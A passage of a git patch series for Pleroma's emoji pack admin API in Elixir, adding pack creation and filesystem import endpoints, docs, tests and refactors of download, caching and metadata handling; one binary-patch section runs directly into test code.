+ refute File.exists?("#{@emoji_dir_path}/test_pack/blank_url.png")
end
end
From 6b4a144e4d9fa17db6fbda800511f7f41ae1c731 Mon Sep 17 00:00:00 2001
From: vaartis
Date: Sat, 24 Aug 2019 21:58:21 +0000
Subject: [PATCH 151/272] Remove unused yaml dependency from mix.lock
---
mix.lock | 1 -
1 file changed, 1 deletion(-)
diff --git a/mix.lock b/mix.lock
index d27041b96..24b34c09c 100644
--- a/mix.lock
+++ b/mix.lock
@@ -99,5 +99,4 @@
"unsafe": {:hex, :unsafe, "1.0.1", "a27e1874f72ee49312e0a9ec2e0b27924214a05e3ddac90e91727bc76f8613d8", [:mix], [], "hexpm"},
"web_push_encryption": {:hex, :web_push_encryption, "0.2.1", "d42cecf73420d9dc0053ba3299cc8c8d6ff2be2487d67ca2a57265868e4d9a98", [:mix], [{:httpoison, "~> 1.0", [hex: :httpoison, repo: "hexpm", optional: false]}, {:jose, "~> 1.8", [hex: :jose, repo: "hexpm", optional: false]}, {:poison, "~> 3.0", [hex: :poison, repo: "hexpm", optional: false]}], "hexpm"},
"websocket_client": {:git, "https://github.com/jeremyong/websocket_client.git", "9a6f65d05ebf2725d62fb19262b21f1805a59fbf", []},
- "yamerl": {:hex, :yamerl, "0.4.0", "ae215b1242810a9bc07716b88062f1bfe06f6bc7cf68372091f630baa536df79", [:rebar3], [], "hexpm"},
}
From f5131540dc9bbf8038e6625f4524ca01b52abbbf Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Wed, 28 Aug 2019 19:29:01 +0300
Subject: [PATCH 152/272] Add a way to create emoji packs via an endpoint
---
.../web/emoji_api/emoji_api_controller.ex | 21 ++++++++++++
lib/pleroma/web/router.ex | 1 +
test/web/emoji_api_controller_test.exs | 34 +++++++++++++++++++
3 files changed, 56 insertions(+)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 87ae0e092..0bd9cd207 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -211,6 +211,27 @@ def download_from(conn, %{"instance_address" => address, "pack_name" => name} =
end
end
+ def create(conn, %{"name" => name}) do
+ pack_dir = Path.join(@emoji_dir_path, name)
+
+ unless File.exists?(pack_dir) do
+ File.mkdir_p!(pack_dir)
+
+ pack_file_p = Path.join(pack_dir, "pack.json")
+
+ File.write!(
+ pack_file_p,
+ Jason.encode!(%{pack: %{}, files: %{}})
+ )
+
+ conn |> text("ok")
+ else
+ conn
+ |> put_status(:conflict)
+ |> text("A pack named \"#{name}\" already exists")
+ end
+ end
+
def delete(conn, %{"name" => name}) do
pack_dir = Path.join(@emoji_dir_path, name)
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index acd6f740b..a21fefc70 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -220,6 +220,7 @@ defmodule Pleroma.Web.Router do
post("/update_file/:pack_name", EmojiAPIController, :update_file)
post("/update_metadata/:pack_name", EmojiAPIController, :update_metadata)
+ post("/create/:name", EmojiAPIController, :create)
delete("/delete/:name", EmojiAPIController, :delete)
post("/download_from", EmojiAPIController, :download_from)
end
diff --git a/test/web/emoji_api_controller_test.exs b/test/web/emoji_api_controller_test.exs
index c1aece691..fa194a26c 100644
--- a/test/web/emoji_api_controller_test.exs
+++ b/test/web/emoji_api_controller_test.exs
@@ -331,4 +331,38 @@ test "updating pack files" do
refute File.exists?("#{@emoji_dir_path}/test_pack/blank_url.png")
end
+
+ test "creating and deleting a pack" do
+ on_exit(fn ->
+ File.rm_rf!("#{@emoji_dir_path}/test_created")
+ end)
+
+ admin = insert(:user, info: %{is_admin: true})
+
+ conn = build_conn() |> assign(:user, admin)
+
+ assert conn
+ |> put_req_header("content-type", "application/json")
+ |> post(
+ emoji_api_path(
+ conn,
+ :create,
+ "test_created"
+ )
+ )
+ |> text_response(200) == "ok"
+
+ assert File.exists?("#{@emoji_dir_path}/test_created/pack.json")
+
+ assert Jason.decode!(File.read!("#{@emoji_dir_path}/test_created/pack.json")) == %{
+ "pack" => %{},
+ "files" => %{}
+ }
+
+ assert conn
+ |> delete(emoji_api_path(conn, :delete, "test_created"))
+ |> response(200) == "ok"
+
+ refute File.exists?("#{@emoji_dir_path}/test_created/pack.json")
+ end
end
From 13cd93a0d314238427c217ec0ab8f59f329321f5 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Sun, 1 Sep 2019 15:38:45 +0300
Subject: [PATCH 153/272] Use && insted of "and" for checking shared-files for
packs
share-files can be nil and "and" does not like that
---
lib/pleroma/web/emoji_api/emoji_api_controller.ex | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 0bd9cd207..f34a4e08c 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -64,7 +64,7 @@ defp can_download?(pack, pack_path) do
# If the pack is set as shared, check if it can be downloaded
# That means that when asked, the pack can be packed and sent to the remote
# Otherwise, they'd have to download it from external-src
- pack["pack"]["share-files"] and
+ pack["pack"]["share-files"] &&
Enum.all?(pack["files"], fn {_, path} ->
File.exists?(Path.join(pack_path, path))
end)
From 9eb2ee4df0478daec1172eec2289868105b72756 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Tue, 10 Sep 2019 21:16:30 +0300
Subject: [PATCH 154/272] Allow importing old (emoji.txt / plain) packs from
the filesystem
---
.../web/emoji_api/emoji_api_controller.ex | 66 ++++++++++++++++++
lib/pleroma/web/router.ex | 2 +
.../emoji/test_pack_for_import/blank.png | Bin 0 -> 95 bytes
test/web/emoji_api_controller_test.exs | 41 +++++++++++
4 files changed, 109 insertions(+)
create mode 100644 test/instance_static/emoji/test_pack_for_import/blank.png
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index f34a4e08c..dffb91b0f 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -446,4 +446,70 @@ def update_file(
e
end
end
+
+ def import_from_fs(conn, _params) do
+ case File.ls(@emoji_dir_path) do
+ {:error, _} ->
+ conn
+ |> put_status(:internal_server_error)
+ |> text("Error accessing emoji pack directory")
+
+ {:ok, results} ->
+ imported_pack_names =
+ results
+ |> Enum.filter(fn file ->
+ dir_path = Path.join(@emoji_dir_path, file)
+ # Find the directories that do NOT have pack.json
+ File.dir?(dir_path) and not File.exists?(Path.join(dir_path, "pack.json"))
+ end)
+ |> Enum.map(fn dir ->
+ dir_path = Path.join(@emoji_dir_path, dir)
+ emoji_txt_path = Path.join(dir_path, "emoji.txt")
+
+ files_for_pack =
+ if File.exists?(emoji_txt_path) do
+ # There's an emoji.txt file, it's likely from a pack installed by the pack manager.
+ # Make a pack.json file from the contents of that emoji.txt fileh
+
+ # FIXME: Copy-pasted from Pleroma.Emoji/load_from_file_stream/2
+
+ # Create a map of shortcodes to filenames from emoji.txt
+
+ File.read!(emoji_txt_path)
+ |> String.split("\n")
+ |> Enum.map(&String.trim/1)
+ |> Enum.map(fn line ->
+ case String.split(line, ~r/,\s*/) do
+ # This matches both strings with and without tags and we don't care about tags here
+ [name, file | _] ->
+ {name, file}
+
+ _ ->
+ nil
+ end
+ end)
+ |> Enum.filter(fn x -> not is_nil(x) end)
+ |> Enum.into(%{})
+ else
+ # If there's no emoji.txt, assume all files that are of certain extensions from the config
+ # are emojis and import them all
+ Pleroma.Emoji.make_shortcode_to_file_map(
+ dir_path,
+ Pleroma.Config.get!([:emoji, :pack_extensions])
+ )
+ end
+
+ pack_json_contents = Jason.encode!(%{pack: %{}, files: files_for_pack})
+
+ File.write!(
+ Path.join(dir_path, "pack.json"),
+ pack_json_contents
+ )
+
+ dir
+ end)
+
+ conn |> json(imported_pack_names)
+ end
+ end
end
diff --git a/lib/pleroma/web/router.ex b/lib/pleroma/web/router.ex
index a21fefc70..1252048f0 100644
--- a/lib/pleroma/web/router.ex
+++ b/lib/pleroma/web/router.ex
@@ -218,6 +218,8 @@ defmodule Pleroma.Web.Router do
# Modifying packs
pipe_through([:admin_api, :oauth_write])
+ post("/import_from_fs", EmojiAPIController, :import_from_fs)
+
post("/update_file/:pack_name", EmojiAPIController, :update_file)
post("/update_metadata/:pack_name", EmojiAPIController, :update_metadata)
post("/create/:name", EmojiAPIController, :create)
diff --git a/test/instance_static/emoji/test_pack_for_import/blank.png b/test/instance_static/emoji/test_pack_for_import/blank.png
new file mode 100644
index 0000000000000000000000000000000000000000..8f50fa02340e7e09e562f86e00b6e4bd6ad1d565
GIT binary patch
literal 95
zcmeAS@N?(olHy`uVBq!ia0vp^4Is=2Bp6=1#-sr$rjj7PU
+ File.rm!("#{@emoji_dir_path}/test_pack_for_import/emoji.txt")
+ File.rm!("#{@emoji_dir_path}/test_pack_for_import/pack.json")
+ end)
+
+ conn = build_conn()
+ resp = conn |> get(emoji_api_path(conn, :list_packs)) |> json_response(200)
+
+ refute Map.has_key?(resp, "test_pack_for_import")
+
+ admin = insert(:user, info: %{is_admin: true})
+
+ assert conn
+ |> assign(:user, admin)
+ |> post(emoji_api_path(conn, :import_from_fs))
+ |> json_response(200) == ["test_pack_for_import"]
+
+ resp = conn |> get(emoji_api_path(conn, :list_packs)) |> json_response(200)
+ assert resp["test_pack_for_import"]["files"] == %{"blank" => "blank.png"}
+
+ File.rm!("#{@emoji_dir_path}/test_pack_for_import/pack.json")
+ refute File.exists?("#{@emoji_dir_path}/test_pack_for_import/pack.json")
+
+ emoji_txt_content = "blank, blank.png, Fun\n\nblank2, blank.png"
+
+ File.write!("#{@emoji_dir_path}/test_pack_for_import/emoji.txt", emoji_txt_content)
+
+ assert conn
+ |> assign(:user, admin)
+ |> post(emoji_api_path(conn, :import_from_fs))
+ |> json_response(200) == ["test_pack_for_import"]
+
+ resp = conn |> get(emoji_api_path(conn, :list_packs)) |> json_response(200)
+
+ assert resp["test_pack_for_import"]["files"] == %{
+ "blank" => "blank.png",
+ "blank2" => "blank.png"
+ }
+ end
end
From 87057101b0e14eb51ff9367dfe9c5522ea933161 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Tue, 10 Sep 2019 21:34:57 +0300
Subject: [PATCH 155/272] Add documentation for the emoji api endpoints
---
.../web/emoji_api/emoji_api_controller.ex | 52 +++++++++++++++++++
1 file changed, 52 insertions(+)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index dffb91b0f..dc676b00f 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -16,6 +16,12 @@ def reload(conn, _params) do
@cache_seconds_per_file Pleroma.Config.get!([:emoji, :shared_pack_cache_seconds_per_file])
+ @doc """
+ Lists the packs available on the instance as JSON.
+
+ The information is public and does not require authentification. The format is
+ a map of "pack directory name" to pack.json contents.
+ """
def list_packs(conn, _params) do
pack_infos =
case File.ls(@emoji_dir_path) do
@@ -116,6 +122,10 @@ defp make_archive(name, pack, pack_dir) do
zip_result
end
+ @doc """
+ An endpoint for other instances (via admin UI) or users (via browser)
+ to download packs that the instance shares.
+ """
def download_shared(conn, %{"name" => name}) do
pack_dir = Path.join(@emoji_dir_path, name)
pack_file = Path.join(pack_dir, "pack.json")
@@ -143,6 +153,13 @@ def download_shared(conn, %{"name" => name}) do
end
end
+ @doc """
+ An admin endpoint to request downloading a pack named `pack_name` from the instance
+ `instance_address`.
+
+ If the requested instance's admin chose to share the pack, it will be downloaded
+ from that instance, otherwise it will be downloaded from the fallback source, if there is one.
+ """
def download_from(conn, %{"instance_address" => address, "pack_name" => name} = data) do
list_uri = "#{address}/api/pleroma/emoji/packs/list"
@@ -211,6 +228,9 @@ def download_from(conn, %{"instance_address" => address, "pack_name" => name} =
end
end
+ @doc """
+ Creates an empty pack named `name` which then can be updated via the admin UI.
+ """
def create(conn, %{"name" => name}) do
pack_dir = Path.join(@emoji_dir_path, name)
@@ -232,6 +252,9 @@ def create(conn, %{"name" => name}) do
end
end
+ @doc """
+ Deletes the pack `name` and all it's files.
+ """
def delete(conn, %{"name" => name}) do
pack_dir = Path.join(@emoji_dir_path, name)
@@ -244,6 +267,11 @@ def delete(conn, %{"name" => name}) do
end
end
+ @doc """
+ An endpoint to update `pack_names`'s metadata.
+
+ `new_data` is the new metadata for the pack, that will replace the old metadata.
+ """
def update_metadata(conn, %{"pack_name" => name, "new_data" => new_data}) do
pack_dir = Path.join(@emoji_dir_path, name)
pack_file_p = Path.join(pack_dir, "pack.json")
@@ -296,6 +324,20 @@ def update_metadata(conn, %{"pack_name" => name, "new_data" => new_data}) do
end
end
+ @doc """
+ Updates a file in a pack.
+
+ Updating can mean three things:
+
+ - `add` adds an emoji named `shortcode` to the pack `pack_name`,
+ that means that the emoji file needs to be uploaded with the request
+ (thus requiring it to be a multipart request) and be named `file`.
+ There can also be an optional `filename` that will be the new emoji file name
+ (if it's not there, the name will be taken from the uploaded file).
+ - `update` changes emoji shortcode (from `shortcode` to `new_shortcode` or moves the file
+ (from the current filename to `new_filename`)
+ - `remove` removes the emoji named `shortcode` and it's associated file
+ """
def update_file(
conn,
%{"pack_name" => pack_name, "action" => action, "shortcode" => shortcode} = params
@@ -447,6 +489,16 @@ def update_file(
end
end
+ @doc """
+ Imports emoji from the filesystem.
+
+ Importing means checking all the directories in the
+ `$instance_static/emoji/` for directories which do not have
+ `pack.json`. If one has an emoji.txt file, that file will be used
+ to create a `pack.json` file with it's contents. If the directory has
+ neither, all the files with specific configured extenstions will be
+ assumed to be emojis and stored in the new `pack.json` file.
+ """
def import_from_fs(conn, _params) do
case File.ls(@emoji_dir_path) do
{:error, _} ->
From f6d4acc87181c94fa202ff5673f741ae9cb45b14 Mon Sep 17 00:00:00 2001
From: Ekaterina Vaartis
Date: Tue, 10 Sep 2019 22:09:20 +0300
Subject: [PATCH 156/272] Fix credo warnings
---
lib/pleroma/web/emoji_api/emoji_api_controller.ex | 7 ++++---
1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index dc676b00f..cbd237519 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -532,7 +532,8 @@ def import_from_fs(conn, _params) do
|> Enum.map(&String.trim/1)
|> Enum.map(fn line ->
case String.split(line, ~r/,\s*/) do
- # This matches both strings with and without tags and we don't care about tags here
+ # This matches both strings with and without tags
+ # and we don't care about tags here
[name, file | _] ->
{name, file}
@@ -543,8 +544,8 @@ def import_from_fs(conn, _params) do
|> Enum.filter(fn x -> not is_nil(x) end)
|> Enum.into(%{})
else
- # If there's no emoji.txt, assume all files that are of certain extensions from the config
- # are emojis and import them all
+ # If there's no emoji.txt, assume all files
+ # that are of certain extensions from the config are emojis and import them all
Pleroma.Emoji.make_shortcode_to_file_map(
dir_path,
Pleroma.Config.get!([:emoji, :pack_extensions])
From 163082de6f789044b4fcb0c69f5b4cfd89731903 Mon Sep 17 00:00:00 2001
From: vaartis
Date: Wed, 11 Sep 2019 09:07:19 +0000
Subject: [PATCH 157/272] Apply suggestion to
lib/pleroma/web/emoji_api/emoji_api_controller.ex
---
.../web/emoji_api/emoji_api_controller.ex | 20 ++++++-------------
1 file changed, 6 insertions(+), 14 deletions(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index cbd237519..499802fa5 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -104,22 +104,14 @@ defp make_archive(name, pack, pack_dir) do
# Having a different pack.json md5 invalidates cache
pack_file_md5 = :crypto.hash(:md5, File.read!(Path.join(pack_dir, "pack.json")))
- maybe_cached_pack = Cachex.get!(:emoji_packs_cache, name)
+ case Cachex.get!(:emoji_packs_cache, name) do
+ %{pack_file_md5: ^pack_file_md5, pack_data: zip_result} ->
+ Logger.debug("Using cache for the '#{name}' shared emoji pack")
+ zip_result
- zip_result =
- if is_nil(maybe_cached_pack) do
+ _ ->
create_archive_and_cache(name, pack, pack_dir, pack_file_md5)
- else
- if maybe_cached_pack[:pack_file_md5] == pack_file_md5 do
- Logger.debug("Using cache for the '#{name}' shared emoji pack")
-
- maybe_cached_pack[:pack_data]
- else
- create_archive_and_cache(name, pack, pack_dir, pack_file_md5)
- end
- end
-
- zip_result
+ end
end
@doc """
From c049c32270b8f70ae679e739730a3f63cdbd7d95 Mon Sep 17 00:00:00 2001
From: vaartis
Date: Wed, 11 Sep 2019 09:12:22 +0000
Subject: [PATCH 158/272] Fixed a typo in create_archive_and_cache
---
lib/pleroma/web/emoji_api/emoji_api_controller.ex | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 499802fa5..51620a3eb 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -94,7 +94,7 @@ defp create_archive_and_cache(name, pack, pack_dir, md5) do
ttl: cache_ms
)
- Logger.debug("Create an archive for the '#{name}' emoji pack, \
+ Logger.debug("Created an archive for the '#{name}' emoji pack, \
keeping it in cache for #{div(cache_ms, 1000)}s")
zip_result
From f251225caeede08869b472886337afea0cd47d51 Mon Sep 17 00:00:00 2001
From: vaartis
Date: Wed, 11 Sep 2019 15:32:54 +0000
Subject: [PATCH 159/272] Apply suggestions to emoji_api_controller.ex
---
.../web/emoji_api/emoji_api_controller.ex | 201 +++++++++---------
1 file changed, 95 insertions(+), 106 deletions(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 51620a3eb..0c3da6740 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -153,31 +153,32 @@ def download_shared(conn, %{"name" => name}) do
from that instance, otherwise it will be downloaded from the fallback source, if there is one.
"""
def download_from(conn, %{"instance_address" => address, "pack_name" => name} = data) do
- list_uri = "#{address}/api/pleroma/emoji/packs/list"
-
- list = Tesla.get!(list_uri).body |> Jason.decode!()
- full_pack = list[name]
+ full_pack =
+ "#{address}/api/pleroma/emoji/packs/list"
+ |> Tesla.get!()
+ |> Map.get(:body)
+ |> Jason.decode!()
+ |> Map.get(name)
pfiles = full_pack["files"]
- pack = full_pack["pack"]
pack_info_res =
- cond do
- pack["share-files"] && pack["can-download"] ->
+ case full_pack["pack"] do
+ %{"share-files" => true, "can-download" => true, "download-sha256" => sha} ->
{:ok,
%{
- sha: pack["download-sha256"],
+ sha: sha,
uri: "#{address}/api/pleroma/emoji/packs/download_shared/#{name}"
}}
- pack["fallback-src"] ->
+ %{"fallback-src" => src, "fallback-src-sha256" => sha} when is_binary(src) ->
{:ok,
%{
- sha: pack["fallback-src-sha256"],
- uri: pack["fallback-src"],
+ sha: sha,
+ uri: src,
fallback: true
}}
- true ->
+ _ ->
{:error, "The pack was not set as shared and there is no fallback src to download from"}
end
@@ -194,9 +195,9 @@ def download_from(conn, %{"instance_address" => address, "pack_name" => name} =
File.mkdir_p!(pack_dir)
# Fallback cannot contain a pack.json file
- files =
- unless(pinfo[:fallback], do: ['pack.json'], else: []) ++
- (pfiles |> Enum.map(fn {_, path} -> to_charlist(path) end))
+ files = Enum.map(full_pack["files"], fn {_, path} -> to_charlist(path) end)
+ # Fallback cannot contain a pack.json file
+ files = if pinfo[:fallback], do: files, else: ['pack.json'] ++ files
{:ok, _} = :zip.unzip(emoji_archive, cwd: to_charlist(pack_dir), file_list: files)
@@ -226,7 +227,7 @@ def download_from(conn, %{"instance_address" => address, "pack_name" => name} =
def create(conn, %{"name" => name}) do
pack_dir = Path.join(@emoji_dir_path, name)
- unless File.exists?(pack_dir) do
+ if not File.exists?(pack_dir) do
File.mkdir_p!(pack_dir)
pack_file_p = Path.join(pack_dir, "pack.json")
@@ -265,8 +266,7 @@ def delete(conn, %{"name" => name}) do
`new_data` is the new metadata for the pack, that will replace the old metadata.
"""
def update_metadata(conn, %{"pack_name" => name, "new_data" => new_data}) do
- pack_dir = Path.join(@emoji_dir_path, name)
- pack_file_p = Path.join(pack_dir, "pack.json")
+ pack_file_p = Path.join([@emoji_dir_path, name, "pack.json"])
full_pack = Jason.decode!(File.read!(pack_file_p))
@@ -275,47 +275,42 @@ def update_metadata(conn, %{"pack_name" => name, "new_data" => new_data}) do
not is_nil(new_data["fallback-src"]) and
new_data["fallback-src"] != full_pack["pack"]["fallback-src"]
- new_data =
- if should_update_fb_sha do
- pack_arch = Tesla.get!(new_data["fallback-src"]).body
+ with {_, true} <- {:should_update?, should_update_fb_sha},
+ %{body: pack_arch} <- Tesla.get!(new_data["fallback-src"]),
+ {:ok, flist} <- :zip.unzip(pack_arch, [:memory]),
+ {_, true} <- {:has_all_files?, has_all_files?(full_pack, flist)} do
+ fallback_sha = :crypto.hash(:sha256, pack_arch) |> Base.encode16()
- {:ok, flist} = :zip.unzip(pack_arch, [:memory])
+ new_data = Map.put(new_data, "fallback-src-sha256", fallback_sha)
+ update_metadata_and_send(conn, full_pack, new_data, pack_file_p)
+ else
+ {:should_update?, _} ->
+ update_metadata_and_send(conn, full_pack, new_data, pack_file_p)
- # Check if all files from the pack.json are in the archive
- has_all_files =
- Enum.all?(full_pack["files"], fn {_, from_manifest} ->
- Enum.find(flist, fn {from_archive, _} ->
- to_string(from_archive) == from_manifest
- end)
- end)
-
- unless has_all_files do
- {:error,
- conn
- |> put_status(:bad_request)
- |> text("The fallback archive does not have all files specified in pack.json")}
- else
- fallback_sha = :crypto.hash(:sha256, pack_arch) |> Base.encode16()
-
- {:ok, new_data |> Map.put("fallback-src-sha256", fallback_sha)}
- end
- else
- {:ok, new_data}
- end
-
- case new_data do
- {:ok, new_data} ->
- full_pack = Map.put(full_pack, "pack", new_data)
- File.write!(pack_file_p, Jason.encode!(full_pack, pretty: true))
-
- # Send new data back with fallback sha filled
- conn |> json(new_data)
-
- {:error, e} ->
- e
+ {:has_all_files?, _} ->
+ conn
+ |> put_status(:bad_request)
+ |> text("The fallback archive does not have all files specified in pack.json")
end
end
+ # Check if all files from the pack.json are in the archive
+ defp has_all_files?(%{"files" => files}, flist) do
+ Enum.all?(files, fn {_, from_manifest} ->
+ Enum.find(flist, fn {from_archive, _} ->
+ to_string(from_archive) == from_manifest
+ end)
+ end)
+ end
+
+ defp update_metadata_and_send(conn, full_pack, new_data, pack_file_p) do
+ full_pack = Map.put(full_pack, "pack", new_data)
+ File.write!(pack_file_p, Jason.encode!(full_pack, pretty: true))
+
+ # Send new data back with fallback sha filled
+ json(conn, new_data)
+ end
+
@doc """
Updates a file in a pack.
@@ -492,69 +487,63 @@ def update_file(
assumed to be emojis and stored in the new `pack.json` file.
"""
def import_from_fs(conn, _params) do
- case File.ls(@emoji_dir_path) do
+ with {:ok, results} <- File.ls(@emoji_dir_path) do
+ imported_pack_names =
+ results
+ |> Enum.filter(fn file ->
+ dir_path = Path.join(@emoji_dir_path, file)
+ # Find the directories that do NOT have pack.json
+ File.dir?(dir_path) and not File.exists?(Path.join(dir_path, "pack.json"))
+ end)
+ |> Enum.map(&write_pack_json_contents/1)
+
+ json(conn, imported_pack_names)
+ else
{:error, _} ->
conn
|> put_status(:internal_server_error)
|> text("Error accessing emoji pack directory")
+ end
+ end
- {:ok, results} ->
- imported_pack_names =
- results
- |> Enum.filter(fn file ->
- dir_path = Path.join(@emoji_dir_path, file)
- # Find the directories that do NOT have pack.json
- File.dir?(dir_path) and not File.exists?(Path.join(dir_path, "pack.json"))
- end)
- |> Enum.map(fn dir ->
- dir_path = Path.join(@emoji_dir_path, dir)
- emoji_txt_path = Path.join(dir_path, "emoji.txt")
+ defp write_pack_json_contents(dir) do
+ dir_path = Path.join(@emoji_dir_path, dir)
+ emoji_txt_path = Path.join(dir_path, "emoji.txt")
- files_for_pack =
- if File.exists?(emoji_txt_path) do
- # There's an emoji.txt file, it's likely from a pack installed by the pack manager.
- # Make a pack.json file from the contents of that emoji.txt fileh
+ files_for_pack = files_for_pack(emoji_txt_path, dir_path)
+ pack_json_contents = Jason.encode!(%{pack: %{}, files: files_for_pack})
- # FIXME: Copy-pasted from Pleroma.Emoji/load_from_file_stream/2
+ File.write!(Path.join(dir_path, "pack.json"), pack_json_contents)
- # Create a map of shortcodes to filenames from emoji.txt
+ dir
+ end
- File.read!(emoji_txt_path)
- |> String.split("\n")
- |> Enum.map(&String.trim/1)
- |> Enum.map(fn line ->
- case String.split(line, ~r/,\s*/) do
- # This matches both strings with and without tags
- # and we don't care about tags here
- [name, file | _] ->
- {name, file}
+ defp files_for_pack(emoji_txt_path, dir_path) do
+ if File.exists?(emoji_txt_path) do
+ # There's an emoji.txt file, it's likely from a pack installed by the pack manager.
+ # Make a pack.json file from the contents of that emoji.txt fileh
- _ ->
- nil
- end
- end)
- |> Enum.filter(fn x -> not is_nil(x) end)
- |> Enum.into(%{})
- else
- # If there's no emoji.txt, assume all files
- # that are of certain extensions from the config are emojis and import them all
- Pleroma.Emoji.make_shortcode_to_file_map(
- dir_path,
- Pleroma.Config.get!([:emoji, :pack_extensions])
- )
- end
+ # FIXME: Copy-pasted from Pleroma.Emoji/load_from_file_stream/2
- pack_json_contents = Jason.encode!(%{pack: %{}, files: files_for_pack})
-
- File.write!(
- Path.join(dir_path, "pack.json"),
- pack_json_contents
- )
-
- dir
- end)
-
- conn |> json(imported_pack_names)
+ # Create a map of shortcodes to filenames from emoji.txt
+ File.read!(emoji_txt_path)
+ |> String.split("\n")
+ |> Enum.map(&String.trim/1)
+ |> Enum.map(fn line ->
+ case String.split(line, ~r/,\s*/) do
+ # This matches both strings with and without tags
+ # and we don't care about tags here
+ [name, file | _] -> {name, file}
+ _ -> nil
+ end
+ end)
+ |> Enum.filter(fn x -> not is_nil(x) end)
+ |> Enum.into(%{})
+ else
+ # If there's no emoji.txt, assume all files
+ # that are of certain extensions from the config are emojis and import them all
+ pack_extensions = Pleroma.Config.get!([:emoji, :pack_extensions])
+ Pleroma.Emoji.make_shortcode_to_file_map(dir_path, pack_extensions)
end
end
end
From b8a214b0ab264a64ca287e40e99acd401810ef58 Mon Sep 17 00:00:00 2001
From: vaartis
Date: Wed, 11 Sep 2019 15:48:51 +0000
Subject: [PATCH 160/272] Split list_packs
---
.../web/emoji_api/emoji_api_controller.ex | 75 ++++++++++---------
1 file changed, 39 insertions(+), 36 deletions(-)
diff --git a/lib/pleroma/web/emoji_api/emoji_api_controller.ex b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
index 0c3da6740..22619f4d7 100644
--- a/lib/pleroma/web/emoji_api/emoji_api_controller.ex
+++ b/lib/pleroma/web/emoji_api/emoji_api_controller.ex
@@ -23,47 +23,49 @@ def reload(conn, _params) do
a map of "pack directory name" to pack.json contents.
"""
def list_packs(conn, _params) do
- pack_infos =
- case File.ls(@emoji_dir_path) do
- {:error, _} ->
- %{}
+ with {:ok, results} <- File.ls(@emoji_dir_path) do
+ pack_infos =
+ results
+ |> Enum.filter(&has_pack_json?/1)
+ |> Enum.map(&load_pack/1)
+ # Check if all the files are in place and can be sent
+ |> Enum.map(&validate_pack/1)
+ # Transform into a map of pack-name => pack-data
+ |> Enum.into(%{})
- {:ok, results} ->
- results
- |> Enum.filter(fn file ->
- dir_path = Path.join(@emoji_dir_path, file)
- # Filter to only use the pack.json packs
- File.dir?(dir_path) and File.exists?(Path.join(dir_path, "pack.json"))
- end)
- |> Enum.map(fn pack_name ->
- pack_path = Path.join(@emoji_dir_path, pack_name)
- pack_file = Path.join(pack_path, "pack.json")
+ json(conn, pack_infos)
+ end
+ end
- {pack_name, Jason.decode!(File.read!(pack_file))}
- end)
- # Transform into a map of pack-name => pack-data
- # Check if all the files are in place and can be sent
- |> Enum.map(fn {name, pack} ->
- pack_path = Path.join(@emoji_dir_path, name)
+ defp has_pack_json?(file) do
+ dir_path = Path.join(@emoji_dir_path, file)
+ # Filter to only use the pack.json packs
+ File.dir?(dir_path) and File.exists?(Path.join(dir_path, "pack.json"))
+ end
- if can_download?(pack, pack_path) do
- archive_for_sha = make_archive(name, pack, pack_path)
- archive_sha = :crypto.hash(:sha256, archive_for_sha) |> Base.encode16()
+ defp load_pack(pack_name) do
+ pack_path = Path.join(@emoji_dir_path, pack_name)
+ pack_file = Path.join(pack_path, "pack.json")
- {name,
- pack
- |> put_in(["pack", "can-download"], true)
- |> put_in(["pack", "download-sha256"], archive_sha)}
- else
- {name,
- pack
- |> put_in(["pack", "can-download"], false)}
- end
- end)
- |> Enum.into(%{})
- end
+ {pack_name, Jason.decode!(File.read!(pack_file))}
+ end
- conn |> json(pack_infos)
+ defp validate_pack({name, pack}) do
+ pack_path = Path.join(@emoji_dir_path, name)
+
+ if can_download?(pack, pack_path) do
+ archive_for_sha = make_archive(name, pack, pack_path)
+ archive_sha = :crypto.hash(:sha256, archive_for_sha) |> Base.encode16()
+
+ pack =
+ pack
+ |> put_in(["pack", "can-download"], true)
+ |> put_in(["pack", "download-sha256"], archive_sha)
+
